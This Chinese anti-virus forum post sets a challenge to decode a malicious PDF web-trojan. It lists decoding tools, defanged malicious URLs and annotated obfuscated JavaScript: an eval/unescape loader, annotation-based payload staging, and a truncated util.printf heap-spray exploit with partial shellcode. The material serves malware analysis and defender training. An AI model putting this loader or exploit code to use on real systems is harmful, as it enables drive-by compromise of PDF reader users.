瑞星卡卡安全论坛

解密文件见附件！

规则：1.一次解完并附解密日志和步骤（包含swf和pdf网马），奖赏10威望，如果部分解出，每步奖赏2威望；
            2.对于积极参与此活动会员，并多次中奖者，我们可以诚邀加入卡卡反病毒小组

解密工具：
  Freshow（中文版）
  Redoce（中文版）
  Malzilla （汉化版）

在线解析站点：
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/

注：论坛所有会员均可参加，严禁使用md的自动解密功能

恶意网址来源瑞星全功能安全软件拦截到真实有效的地址

hxxp://bahed.in/x/l.php?s=email_iex&
hxxp://bahed.in/x/l.php?s=gicon_iex&
hxxp://bahed.in/x/l.php?s=newp_&
hxxp://bahed.in/x/l.php?s=printf_iex&

//第一部分

var nu_skoree_eta_svoboda_s = "777e7".substr(3,1); //e
var xx=["0","ee%xxjkjkjkkjkj","wss","9","ccc"];
var zz=xx[1].substr(2,1); //%
var nu_skoree_eta_svoboda_s2 = "replace";
var nu_skoree_eta_svoboda_sx = "vzl";
var ZjELIFipma17 = this["eval"]; 

function nu_skoree_eta_svoboda_sh999()
{ nu_skoree_eta_svoboda_sx = "unzzzzzap";  }         
var axzv="";       
if (nu_skoree_eta_svoboda_s=="e") var af="function ";         
for (jjj = 0; jjj < 999; jjj ++ )
{         
    if (nu_skoree_eta_svoboda_s=="e") 
    axzv+=af+"nu_skoree_eta_svoboda_sh"+(jjj+4-2-2)+"(){nu_skoree_eta_svoboda_sh"+(jjj+6-3-2)+"()"+""+";}"+""+"      ";
    /*
    function nu_skoree_eta_svoboda_sh0()
    {
        nu_skoree_eta_svoboda_sh1();
    }
    这样的函数名，一直到nu_skoree_eta_svoboda_sh999()
    */
}         
ZjELIFipma17(""+axzv+"nu_skoree_eta_svoboda_sh0();");//eval执行
var TTEvprOpJr18 = this[nu_skoree_eta_svoboda_sx[nu_skoree_eta_svoboda_s2]("z"+"z"+"z"+"z"+"z","e"+"s"+"c")+nu_skoree_eta_svoboda_s]; 
//replace成unescape
var gdbWnSzRdY15 = /j/gi;//这个时候面replace要用到的东西
var nu_skoree_eta_svoboda_s4 = "j76j61j72j20j65j41j6Fj44j74j6Bj44j6Ej41j59j37j37j7Aj20j3Dj20j61j70j70j3Bj76j61j72j20j64j79j69j57j72j4Ej41j51j41j68j31j30j20j3Dj20j65j41j6Fj44j74j6Bj44j6Ej41j59j37j37j7Aj2Ej64j6Fj63j3Bj64j79j69j57j72j4Ej41j51j41j68j31j30j2Ej73j79j6Ej63j41j6Ej6Ej6Fj74j53j63j61j6Ej28j29j3Bj76j61j72j20j6Bj4Cj70j65j6Bj66j49j43j59j4Bj34j20j3Dj20j64j79j69j57j72j4Ej41j51j41j68j31j30j2Ej67j65j74j41j6Ej6Ej6Fj74j73j28j30j29j3Bj76j61j72j20j43j75j70j4Aj68j77j76j75j68j4Dj35j20j3Dj20j6Bj4Cj70j65j6Bj66j49j43j59j4Bj34j5Bj30j5Dj2Ej73j75j62j6Aj65j63j74j3Bj76j61j72j20j57j47j73j77j77j5Aj4Aj62j50j68j36j20j3Dj20j43j75j70j4Aj68j77j76j75j68j4Dj35j2Ej72j65j70j6Cj61j63j65j28j67j64j62j57j6Ej53j7Aj52j64j59j31j35j2Cj22j25j22j29j3Bj76j61j72j20j44j41j73j74j65j64j59j6Dj67j78j37j3Dj54j54j45j76j70j72j4Fj70j4Aj72j31j38j28j54j54j45j76j70j72j4Fj70j4Aj72j31j38j28j57j47j73j77j77j5Aj4Aj62j50j68j36j29j29j3Bj65j76j61j6Cj28j44j41j73j74j65j64j59j6Dj67j78j37j29j3B";
ZjELIFipma17/*eval*/(TTEvprOpJr18/*unescape*/(nu_skoree_eta_svoboda_s4[nu_skoree_eta_svoboda_s2/*replace*/](gdbWnSzRdY15/*/j/gi*/,zz/*%*/)));

//第二部分

var eAoDtkDnAY77z = app;
var dyiWrNAQAh10 = eAoDtkDnAY77z.doc;
dyiWrNAQAh10.syncAnnotScan();
var kLpekfICYK4 = dyiWrNAQAh10.getAnnots(0);
var CupJhwvuhM5 = kLpekfICYK4[0].subject;
var WGswwZJbPh6 = CupJhwvuhM5.replace(gdbWnSzRdY15,"%"); //这部分解密看第三部分
var DAstedYmgx7=TTEvprOpJr18(TTEvprOpJr18(WGswwZJbPh6));
eval(DAstedYmgx7);//这个是执行shellcode部分了，是最后执行的过程

//第三部分，处理这部分
/*
<<
/Length 180891
>>
stream
j25j30j41j25j36j36j25j37j35j25j36j45j25j36j33j25j37j34j25j36j39j25j36j46j25j36j45j25j32j30j25j36j36j25j36j39j25j37j38j25j35j46j25j36j39j25j37j34j25j32j38j25j37j39j25j36j31j25j37j32j25j37j33j25j37j30j25j32j43j25j32j30j25j36
还是那个replace函数，j->%然后解密，就出现以下部分了

function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
    yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}
function util_printf(){
  var payload = unescape("
%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0
%uFFF6%uFFFF%u54E8%u0003%u8B00（shellcode太多，不写了，接下来的shellcode解密就都会了）
*/